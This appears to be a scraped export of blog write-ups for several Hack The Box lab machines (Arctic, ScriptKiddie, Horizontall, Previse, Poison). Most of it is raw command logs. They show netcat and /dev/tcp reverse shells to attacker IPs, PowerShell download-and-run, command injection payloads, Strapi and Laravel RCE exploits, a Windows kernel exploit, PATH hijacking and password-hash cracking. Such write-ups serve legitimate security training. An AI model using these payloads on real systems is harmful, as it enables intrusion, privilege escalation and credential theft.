tolis::ARCTIC:aaaaaaaaaaaaaaaa:c542f5a7a35d08fb97440dcae060b508:01010000000000000079e8fa958fdb0199d3a7cce7b544db00000000010010004a00550051007500770064006b004300030010004a00550051007500770064006b00430002001000500073005400480047006e005800440004001000500073005400480047006e0058004400070008000079e8fa958fdb01060004000200000008003000300000000000000000000000003000006d512dfe482ef201bb28a406e85c0fc4005f2cfd87b665b2061df41978469e2b0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003000000000000000000000000000 [*] Disconnecting Share(1:IPC$) [*] Disconnecting Share(2:SHARE) ------------INITIAL FOOTHOLD CMD.EXE------------- C:\\ColdFusion8\\runtime\\bin>\\\\10.10.14.10\\share\\nc.exe -e cmd.exe 10.10.14.10 4444 \\\\10.10.14.10\\share\\nc.exe -e cmd.exe 10.10.14.10 4444 -----------NEW CMD.EXE ON PORT 4444----------------- ┌──(kali㉿kali)-[~/htb/Arctic] └─$ nc -lnvp 4444 listening on [any] 4444 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49435 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. 
C:\\ColdFusion8\\runtime\\bin>\\\\10.10.14.10\\share\\nc.exe -e powershell.exe 10.10.14.10 5555 \\\\10.10.14.10\\share\\nc.exe -e powershell.exe 10.10.14.10 5555 C:\\ColdFusion8\\runtime\\bin>powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:8888/shell.ps1') powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:8888/shell.ps1') -----------POWERSHELL ON PORT 1338------------------ ┌──(kali㉿kali)-[~/htb/Arctic] └─$ nc -lnvp 1338 listening on [any] 1338 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49451 Windows PowerShell running as user tolis on ARCTIC Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\\ColdFusion8\\runtime\\bin>whoami arctic\\tolis Privilege Escalation Kernel Exploit : Chimichurri.exe Searching for an elevation-of-privilege CVE using \"wes\" windows-exploits-suggester.\n┌──(kali㉿kali)-[~/htb/Arctic] └─$ wes ./arctic_systeminfo | grep -I 'Elevation of Privilege' -B7 | grep CVE-2010-2554 -A7 -B2 Date: 20100810 CVE: CVE-2010-2554 KB: KB982799 Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege -- We find a GitHub repo with an already compiled exe for the exploit:\nhttps://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe\nPS C:\\Users\\tolis> .\\Chimichurri.exe /Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR> PS C:\\Users\\tolis> .\\Chimichurri.exe 10.10.14.10 7676 --------------------- ┌──(kali㉿kali)-[~/htb/Arctic] └─$ 
nc -lnvp 7676 listening on [any] 7676 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 50748 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\\Users\\tolis>whoami whoami nt authority\\system C:\\Users\\tolis>cd ../Administrator\\Desktop cd ../Administrator\\Desktop C:\\Users\\Administrator\\Desktop>type root.txt type root.txt 8980.....ffb6 ","date":"2025-03-08T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/arctic-htb/","title":"HTB | Arctic"},{"content":" Machine name OS IP Difficulty ScriptKiddie Linux 10.10.10.226 Easy Enumeration nmap ┌──(kali㉿kali)-[~/htb/ScriptKiddie] └─$ nmap -sC -sV -An -T4 -vvv 10.10.10.226 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA) | ssh-rsa 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 | 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJA31QhiIbYQMUwn/n3+qcrLiiJpYIia8HdgtwkI8JkCDm2n+j6dB3u5I17IOPXE7n5iPiW9tPF3Nb0aXmVJmlo= | 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOWjCdxetuUPIPnEGrowvR7qRAR7nuhUbfFraZFmbIr4 5000/tcp open http syn-ack ttl 63 Werkzeug httpd 0.16.1 (Python 3.8.5) | http-methods: |_ Supported Methods: GET OPTIONS HEAD POST |_http-server-header: Werkzeug/0.16.1 Python/3.8.5 |_http-title: k1d'5 h4ck3r t00l5 Foothold msfvenom - apk template injection We have access to a web page on port 5000 where several commands can be run, notably:\nvenom it up - gen rev tcp meterpreter bins which lets us easily generate a reverse meterpreter with msfvenom for android, linux, windows.\nWe are allowed to supply a template file. 
After searching the internet and searchsploit, we find a vuln in the msfvenom tool.\nIf we run msfvenom for the android meterpreter, passing a tampered apk as the template (-x), we get an RCE:\nmsfvenom -x /tmp/tmp9ep2m3p9/poc.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null\n# APK TEMPLATE FILE CREATION PYTHON SCRIPT #!/usr/bin/env python3 import subprocess import tempfile import os from base64 import b32encode # Change me payload = 'sh -i >& /dev/tcp/10.10.14.19/1337 0>&1' # b32encode to avoid badchars (keytool is picky) # thanks to @fdellwing for noticing that base64 can sometimes break keytool # <https://github.com/justinsteven/advisories/issues/2> payload_b32 = b32encode(payload.encode()).decode() dname = f\"CN='|echo {payload_b32} | base32 -d | sh #\" ... -------------------------------------- $ python3 poc.py [+] Manufacturing evil apkfile Payload: sh -i >& /dev/tcp/10.10.14.19/1337 0>&1 -dname: CN='|echo ONUCALLJEA7CMIBPMRSXML3UMNYC6MJQFYYTALRRGQXDCOJPGEZTGNZAGA7CMMI= | base32 -d | sh # adding: empty (stored 0%) Génération d'une paire de clés RSA de 2 048 bits et d'un certificat auto-signé (SHA256withRSA) d'une validité de 90 jours pour : CN=\"'|echo ONUCALLJEA7CMIBPMRSXML3UMNYC6MJQFYYTALRRGQXDCOJPGEZTGNZAGA7CMMI= | base32 -d | sh #\" jar signed. Warning: The signer's certificate is self-signed. The SHA1 algorithm specified for the -digestalg option is considered a security risk and is disabled. The SHA1withRSA algorithm specified for the -sigalg option is considered a security risk and is disabled. POSIX file permission and/or symlink attributes detected. 
These attributes are ignored when signing and are not protected by the signature. [+] Done! apkfile is at /tmp/tmp9ep2m3p9/poc.apk Do: msfvenom -x /tmp/tmp9ep2m3p9/poc.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null --------------------------------- ┌──(kali㉿kali)-[~/htb/ScriptKiddie] └─$ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.14.19] from (UNKNOWN) [10.10.10.226] 55968 sh: 0: can't access tty; job control turned off $ whoami kid $ cat /home/kid/user.txt be0d.....478d kid -> pwn /home/pwn/scanlosers.sh We notice a script we can read in the home directory of the pwn user. We also discover a \"hackers\" file in the logs/ directory of kid (our user).\nThe pwn script runs an nmap against an IP whenever a new line is added to the hackers log file. In that case, it takes the IP written in 3rd position on the line, then runs the nmap. Afterwards, it empties the hackers file.\nWe do notice that when we add a line to the hackers file, it is immediately erased, which proves that the pwn user is continuously running the scanlosers.sh script.\nWe can easily inject a command into the \"hackers\" file in place of the IP address. That command will then be executed by pwn when the scanlosers script runs.\n# Reverse shell in base64 kid@scriptkiddie:/home/pwn$ echo -n 'a a $(echo \"c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTkvNDQ0NCAwPiYx\" | base64 -d | bash)' >> /home/kid/logs/hackers ------------------- ┌──(kali㉿kali)-[~/htb/ScriptKiddie] └─$ nc -lnvp 4444 listening on [any] 4444 ... 
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.226] 56352 sh: 0: can't access tty; job control turned off $ whoami pwn Privilege Escalation msfconsole as root We notice that we can run msfconsole as root. Looking at gtfobins, we directly find a way to open a shell as root from msfconsole\npwn@scriptkiddie:~$ sudo -l Matching Defaults entries for pwn on scriptkiddie: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User pwn may run the following commands on scriptkiddie: (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole pwn@scriptkiddie:~$ sudo msfconsole ###### ############ ####################### # # ### # # ## ######################## ## ## ## ## https://metasploit.com =[ metasploit v6.0.9-dev ] + -- --=[ 2069 exploits - 1122 auxiliary - 352 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] Metasploit tip: Use the edit command to open the currently active module in your editor msf6 > msf6 > irb [-] Unknown command: msf6. msf6 > irb [*] Starting IRB shell... [*] You are in the \"framework\" object irb: warn: can't alias jobs from irb_jobs. 
>> system('/bin/sh') # whoami root # cat /root/root.txt 1f30.....dd22 ","date":"2025-03-07T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/scriptkiddie-htb/","title":"HTB | ScriptKiddie"},{"content":" Machine name OS IP Difficulty Horizontall Linux 10.10.11.105 Easy Enumeration nmap ┌──(kali㉿kali)-[~/htb/Horizontall] └─$ nmap -sC -sV -An -T4 -vvv 10.10.11.105 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL2qJTqj1aoxBGb8yWIN4UJwFs4/UgDEutp3aiL2/6yV2iE78YjGzfU74VKlTRvJZWBwDmIOosOBNl9nfmEzXerD0g5lD5SporBx06eWX/XP2sQSEKbsqkr7Qb4ncvU8CvDR6yGHxmBT8WGgaQsA2ViVjiqAdlUDmLoT2qA3GeLBQgS41e+TysTpzWlY7z/rf/u0uj/C3kbixSB/upkWoqGyorDtFoaGGvWet/q7j5Tq061MaR6cM2CrYcQxxnPy4LqFE3MouLklBXfmNovryI0qVFMki7Cc3hfXz6BmKppCzMUPs8VgtNgdcGywIU/Nq1aiGQfATneqDD2GBXLjzV | 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIyw6WbPVzY28EbBOZ4zWcikpu/CPcklbTUwvrPou4dCG4koataOo/RDg4MJuQP+sR937/ugmINBJNsYC8F7jN0= | 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJqmDVbv9RjhlUzOMmw3SrGPaiDBgdZ9QZ2cKM49jzYB 80/tcp open http syn-ack nginx 1.14.0 (Ubuntu) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Did not follow redirect to http://horizontall.htb |_http-server-header: nginx/1.14.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Foothold : Strapi CMS Subdomain enumeration : api-prod.horizontall.htb ┌──(kali㉿kali)-[~] └─$ ffuf -w /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb -H \"Host: 
FUZZ.horizontall.htb\" -mc 200 /'___\\ /'___\\ /'___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://horizontall.htb :: Wordlist : FUZZ: /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt :: Header : Host: FUZZ.horizontall.htb :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200 ________________________________________________ www [Status: 200, Size: 901, Words: 43, Lines: 2, Duration: 30ms] api-prod [Status: 200, Size: 413, Words: 76, Lines: 20, Duration: 57ms] :: Progress: [114441/114441] :: Job [1/1] :: 2020 req/sec :: Duration: [0:01:02] :: Errors: 0 :: http://api-prod.horizontall.htb/admin/strapiVersion -> 3.0.0-beta.17.4\nCVE : Strapi 3.0.0-beta.17.4 ┌──(kali㉿kali)-[~/htb/Horizontall] └─$ searchsploit strapi 3.0.0-beta.17.4 ------------------------------------------- Exploit Title | Path ------------------------------------------- Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) | multiple/webapps/50239.py Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit) | nodejs/webapps/50716.rb ------------------------------------------- Shellcodes: No Results Strapi RCE ┌──(kali㉿kali)-[~/htb/Horizontall] └─$ python3 50239.py http://api-prod.horizontall.htb [+] Checking Strapi CMS Version running [+] Seems like the exploit will work!!! 
[+] Executing exploit [+] Password reset was successfully [+] Your email is: admin@horizontall.htb [+] Your new credentials are: admin:SuperStrongPassword1 [+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNzQxMjcyNTQ0LCJleHAiOjE3NDM4NjQ1NDR9.VKjJDQK6JqpNUo7Zsg5plpM2HHmdxLyTboI9kDnixHk $> bash -i >& /dev/tcp/10.10.14.19/1337 0>&1 [+] Triggering Remote code executin [*] Rember this is a blind RCE don't expect to see output {\"statusCode\":400,\"error\":\"Bad Request\",\"message\":[{\"messages\":[{\"id\":\"An error occurred\"}]}]} $> bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.19%2F1337%200%3E%261 [+] Triggering Remote code executin [*] Rember this is a blind RCE don't expect to see output {\"statusCode\":400,\"error\":\"Bad Request\",\"message\":[{\"messages\":[{\"id\":\"An error occurred\"}]}]} $> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.19 1337 >/tmp/f [+] Triggering Remote code executin [*] Rember this is a blind RCE don't expect to see output ---------------------------------------------------- ┌──(kali㉿kali)-[~] └─$ nc -lnvp 1337 listening on [any] 1337 ... 
connect to [10.10.14.19] from (UNKNOWN) [10.10.11.105] 43406 bash: cannot set terminal process group (1988): Inappropriate ioctl for device bash: no job control in this shell strapi@horizontall:~/myapi$ whoami whoami strapi database.json - user/password for mysql strapi@horizontall:~/myapi$ grep -rni pass config/ config/environments/production/database.json:13: \"password\": \"${process.env.DATABASE_PASSWORD || ''}\", config/environments/development/database.json:12: \"password\": \"#J!:F9Zt2u\" config/environments/staging/database.json:13: \"password\": \"${process.env.DATABASE_PASSWORD || ''}\", strapi@horizontall:~/myapi$ config/ bash: config/: Is a directory strapi@horizontall:~/myapi$ cd config/ strapi@horizontall:~/myapi/config$ cd environments/development/ strapi@horizontall:~/myapi/config/environments/development$ cat database.json { \"defaultConnection\": \"default\", \"connections\": { \"default\": { \"connector\": \"strapi-hook-bookshelf\", \"settings\": { \"client\": \"mysql\", \"database\": \"strapi\", \"host\": \"127.0.0.1\", \"port\": 3306, \"username\": \"developer\", \"password\": \"#J!:F9Zt2u\" }, \"options\": {} } } } mysql - nothing interesting ptrapi@horizontall:~/myapi/config/environments/development$ mysql -u developer - Enter password: Welcome to the MySQL monitor. Commands end with ; or \\g. 
Your MySQL connection id is 29 Server version: 5.7.35-0ubuntu0.18.04.1 (Ubuntu) Copyright (c) 2000, 2021, Oracle and/or its affiliates. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\\h' for help. Type '\\c' to clear the current input statement. mysql> use strapi; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; +------------------------------+ | Tables_in_strapi | +------------------------------+ | core_store | | reviews | | strapi_administrator | | upload_file | | upload_file_morph | | users-permissions_permission | | users-permissions_role | | users-permissions_user | +------------------------------+ 8 rows in set (0.00 sec) mysql> select * from strapi_administrator; +----+----------+-----------------------+--------------------------------------------------------------+--------------------+---------+ | id | username | email | password | resetPasswordToken | blocked | +----+----------+-----------------------+--------------------------------------------------------------+--------------------+---------+ | 3 | admin | admin@horizontall.htb | $2a$10$bPZbunuhF9lWrddSuw3RI.QmCitfZDJmwbB0WozXlxT2siCwanVVK | NULL | NULL | +----+----------+-----------------------+--------------------------------------------------------------+--------------------+---------+ 1 row in set (0.00 sec) THIS IS OUR PASSWORD THAT WE HAVE DEFINED... Privilege Escalation Laravel port 8000 We discover that a service is running on port 8000; it is the Laravel framework. 
First, I had to do port forwarding in order to get more information.\nChisel We do port forwarding with chisel to mirror the target machine's port 8000 on my Kali. We then discover that it is the Laravel framework hiding behind it.\n┌──(kali㉿kali)-[~/htb/Horizontall] └─$ ./chisel server -p 1082 --reverse 2025/03/06 10:36:18 server: Reverse tunnelling enabled 2025/03/06 10:36:18 server: Fingerprint GadUpp2bJ5QyhTVJpJx1RJ3JnbEW0HpdrGb1bHRNevo= 2025/03/06 10:36:18 server: Listening on http://0.0.0.0:1082 2025/03/06 10:36:20 server: session#1: tun: proxy#R:8000=>localhost:8000: Listening ----------------------- ## On the target machine $ ./chisel client 10.10.14.19:1082 R:8000:localhost:8000 > /dev/null 2> /dev/null & Laravel : CVE-2021-3129 https://nvd.nist.gov/vuln/detail/cve-2021-3129 We need to generate a phar file that will execute a particular command. Then we can exploit Laravel by passing the phar file to the Python script.\n┌──(kali㉿kali)-[~/htb/Horizontall/laravel-exploits/phpggc] └─$ python3 ./laravel-ignition-rce.py Usage: ./laravel-ignition-rce.py <url> </path/to/exploit.phar> [log_file_path] Generate your PHAR using PHPGGC, and add the --fast-destruct flag if you want to see your command's result. The Monolog/RCE1 GC works fine. Example: $ php -d'phar.readonly=0' ./phpggc --phar phar -f -o /tmp/exploit.phar monolog/rce1 system id $ ./laravel-ignition-rce.py http://127.0.0.1:8000/ /tmp/exploit.phar Exploit - gaining root shell ┌──(kali㉿kali)-[~/htb/Horizontall/laravel-exploits/] └─$ git clone https://github.com/ambionics/phpggc.git; cd phpggc ... 
## We generate the phar file that will execute the \"id\" command ┌──(kali㉿kali)-[~/htb/Horizontall/laravel-exploits/phpggc] └─$ php -d'phar.readonly=0' ./phpggc --phar phar -f -o /tmp/exploit.phar monolog/rce1 system \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.19 6666 >/tmp/f\" ┌──(kali㉿kali)-[~/htb/Horizontall/laravel-exploits/phpggc] └─$ cd .. ┌──(kali㉿kali)-[~/htb/Horizontall/laravel-exploits] └─$ python3 ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar + Log file: /home/developer/myproject/storage/logs/laravel.log + Logs cleared + Successfully converted to PHAR ! -------------------------------- ┌──(kali㉿kali)-[~] └─$ nc -lnvp 6666 listening on [any] 6666 ... connect to [10.10.14.19] from (UNKNOWN) [10.10.11.105] 54562 bash: cannot set terminal process group (25151): Inappropriate ioctl for device bash: no job control in this shell root@horizontall:/home/developer/myproject/public# whoami whoami root root@horizontall:/home/developer/myproject/public# cat /root/root.txt cat /root/root.txt a901e.....5a11 ","date":"2025-03-06T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/horizontall-htb/","title":"HTB | Horizontall"},{"content":" Machine name OS IP Difficulty Previse Linux 10.10.11.104 Easy Users m4lwhere:ilovecody112235! 
Enumeration nmap ┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -An -T4 -vvv 10.10.11.104 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbdbnxQupSPdfuEywpVV7Wp3dHqctX3U+bBa/UyMNxMjkPO+rL5E6ZTAcnoaOJ7SK8Mx1xWik7t78Q0e16QHaz3vk2AgtklyB+KtlH4RWMBEaZVEAfqXRG43FrvYgZe7WitZINAo6kegUbBZVxbCIcUM779/q+i+gXtBJiEdOOfZCaUtB0m6MlwE2H2SeID06g3DC54/VSvwHigQgQ1b7CNgQOslbQ78FbhI+k9kT2gYslacuTwQhacntIh2XFo0YtfY+dySOmi3CXFrNlbUc2puFqtlvBm3TxjzRTxAImBdspggrqXHoOPYf2DBQUMslV9prdyI6kfz9jUFu2P1Dd | 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCnDbkb4wzeF+aiHLOs5KNLPZhGOzgPwRSQ3VHK7vi4rH60g/RsecRusTkpq48Pln1iTYQt/turjw3lb0SfEK/4= | 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIICTOv+Redwjirw6cPpkc/d3Fzz4iRB3lCRfZpZ7irps 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-favicon: Unknown favicon MD5: B21DD667DF8D81CAE6DD1374DD548004 |_http-server-header: Apache/2.4.29 (Ubuntu) | http-title: Previse Login |_Requested resource was login.php Foothold Website with bad redirection The website prevents us from viewing certain pages and asks us to authenticate on the login.php page. However, we notice that we actually still receive the page's source code before being redirected! We can therefore capture most of the pages, find them with gobuster, and open them in Burp. We then have access to a page where we can create an account. So we forge a POST request from Burp to create a new account. 
Finally, we can log in to the website in the usual way with our new account\nPOST /accounts.php HTTP/1.1 Host: 10.10.11.104 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 51 Origin: http://10.10.11.104 Connection: keep-alive Referer: http://10.10.11.104/login.php Cookie: PHPSESSID=u7bqrqlp12dv65ple4ev2q1glr Upgrade-Insecure-Requests: 1 Priority: u=0, i username=leopold&password=password&confirm=password files.php - siteBackup.zip We find a zip containing all the website's code. In particular, we get the MySQL creds.\n<?php function connectDB(){ $host = 'localhost'; $user = 'root'; $passwd = 'mySQL_p@ssw0rd!:)'; $db = 'previse'; $mycon = new mysqli($host, $user, $passwd, $db); return $mycon; } ?> logs.php code injection In the logs.php file we discover that a $_POST['delim'] variable is used inside the function. We can easily execute a shell. 
We base64-encode the shell to make the command easier to execute:\nPOST /logs.php ... delim=space;ech'/'o+c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTkvMTMzNyAwPiYx+|+base64+-d+|+bash\n<?php if (!$_SERVER['REQUEST_METHOD'] == 'POST') { header('Location: login.php'); exit; } ///////////////////////////////////////////////////////////////////////////////////// //I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER// ///////////////////////////////////////////////////////////////////////////////////// $output = exec(\"/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}\"); echo $output; $filepath = \"/var/www/out.log\"; $filename = \"out.log\"; if(file_exists($filepath)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); ----------------------------- ┌──(kali㉿kali)-[~/htb/Previse/siteBackup] └─$ nc -lnvp 1337 listening on [any] 1337 ... 
connect to [10.10.14.19] from (UNKNOWN) [10.10.11.104] 60650 sh: 0: can't access tty; job control turned off $ whoami www-data $ python3 -c \"import pty;pty.spawn('/bin/bash')\" www-data@previse:/var/www/html$ www-data@previse:/var/www/html$ www-data@previse:/var/www/html$ export TERM=xterm export TERM=xterm www-data@previse:/var/www/html$ ^Z zsh: suspended nc -lnvp 1337 m4lwhere - mysql db We connect with mysql using the creds recovered from config.php\nmysql> select * from accounts; +----+----------+------------------------------------+---------------------+ | id | username | password | created_at | +----+----------+------------------------------------+---------------------+ | 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 | | 2 | leopold | $1$🧂llol$79cV9c1FNnnr7LcfPFlqQ0 | 2025-03-05 17:01:15 | +----+----------+------------------------------------+---------------------+ We crack the hash with hashcat (md5crypt -> -m 500):\n$ hashcat -m 500 ./hash.txt ~/wordlists/rockyou.txt --show $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235! SSH connection:\n┌──(kali㉿kali)-[~/htb/Previse/siteBackup] └─$ ssh m4lwhere@10.10.11.104 m4lwhere@10.10.11.104's password: Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64) ... 
Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5 m4lwhere@previse:~$ ls user.txt m4lwhere@previse:~$ cat user.txt ccde.....f7fd Privilege Escalation access_backup.sh as root sudo -l -> we see the file /opt/scripts/access_backup.sh, which we can execute as root. We see that it calls the \"gzip\" command.\nm4lwhere@previse:~/bin$ sudo -l User m4lwhere may run the following commands on previse: (root) /opt/scripts/access_backup.sh m4lwhere@previse:~/bin$ cat /opt/scripts/access_backup.sh #!/bin/bash # We always make sure to store logs, we take security SERIOUSLY here # I know I shouldnt run this as root but I cant figure it out programmatically on my account # This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time gzip -c /var/log/apache2/access.log > /var/backups/$(date --date=\"yesterday\" +%Y%b%d)_access.gz gzip -c /var/www/file_access.log > /var/backups/$(date --date=\"yesterday\" +%Y%b%d)_file_access.gz We can easily execute any command as root by modifying the PATH. We create a bin folder in our home directory. In it we put a file named \"gzip\" containing the command that opens a reverse shell. Finally, we add this \"bin\" folder at the front of the PATH. When the access_backup.sh script is executed as root, it looks up where the gzip binary is in order to run it. The first folder it searches is ours, the one we just added, which contains the fake gzip. 
It will therefore execute that one instead of the real gzip and open our reverse shell as root.\nm4lwhere@previse:~/bin$ pwd /home/m4lwhere/bin m4lwhere@previse:~/bin$ export PATH=/home/m4lwhere/bin:$PATH m4lwhere@previse:~/bin$ vim gzip m4lwhere@previse:~/bin$ chmod +x gzip m4lwhere@previse:~/bin$ cat gzip #!/bin/bash sh -i >& /dev/tcp/10.10.14.19/6666 0>&1 m4lwhere@previse:~/bin$ sudo /opt/scripts/access_backup.sh ----------------------------------------- ┌──(kali㉿kali)-[~/htb/Previse/siteBackup] └─$ nc -lnvp 6666 listening on [any] 6666 ... connect to [10.10.14.19] from (UNKNOWN) [10.10.11.104] 50272 # whoami root # cat /root/root.txt 3ed1.....e90e ","date":"2025-03-06T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/previse-htb/","title":"HTB | Previse"},{"content":" Machine name OS IP Difficulty Poison Linux 10.10.10.84 Medium Users charix : Charix!2#4%6&8(0\nEnumeration nmap 22 - ssh 80 - http freebsd apache Foothold charix - user flag On the home page we find a search bar with a vuln that lets us display any file. We display /etc/passwd and find the user charix. Then we find this file on the web page served on port 80 of the machine. It says it is base64-encoded 13 times:\nThis password is secure, it's encoded atleast 13 times.. what could go wrong really.. 
We find this bash script on a forum, which quickly runs base64 -d 13 times:\nstate=$(<b64.txt) for i in {1..13}; do state=$(<<<\"$state\" base64 --decode) done echo \"$state\" We quickly find the password, then connect via SSH:\n┌──(kali㉿kali)-[~/htb] └─$ cd Poison ┌──(kali㉿kali)-[~/htb/Poison] └─$ vim b64.txt ┌──(kali㉿kali)-[~/htb/Poison] └─$ state=$(<b64.txt) for i in {1..13}; do state=$(<<<\"$state\" base64 --decode) done echo \"$state\" Charix!2#4%6&8(0 ┌──(kali㉿kali)-[~/htb/Poison] └─$ 
ssh charix@10.10.10.84 (charix@10.10.10.84) Password for charix@Poison: Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4 FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017 Welcome to FreeBSD! Release Notes, Errata: https://www.FreeBSD.org/releases/ Security Advisories: https://www.FreeBSD.org/security/ FreeBSD Handbook: https://www.FreeBSD.org/handbook/ FreeBSD FAQ: https://www.FreeBSD.org/faq/ Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/ FreeBSD Forums: https://forums.FreeBSD.org/ Documents installed with the system are in the /usr/local/share/doc/freebsd/ directory, or can be installed later with: pkg install en-freebsd-doc For other languages, replace \"en\" with a language code like de or fr. Show the version of FreeBSD installed: freebsd-version ; uname -a Please include that output and any error messages when posting questions. Introduction to manual pages: man man FreeBSD directory layout: man hier Edit /etc/motd to change this login announcement. Man pages are divided into section depending on topic. There are 9 different sections numbered from 1 (General Commands) to 9 (Kernel Developer's Manual). You can get an introduction to each topic by typing man 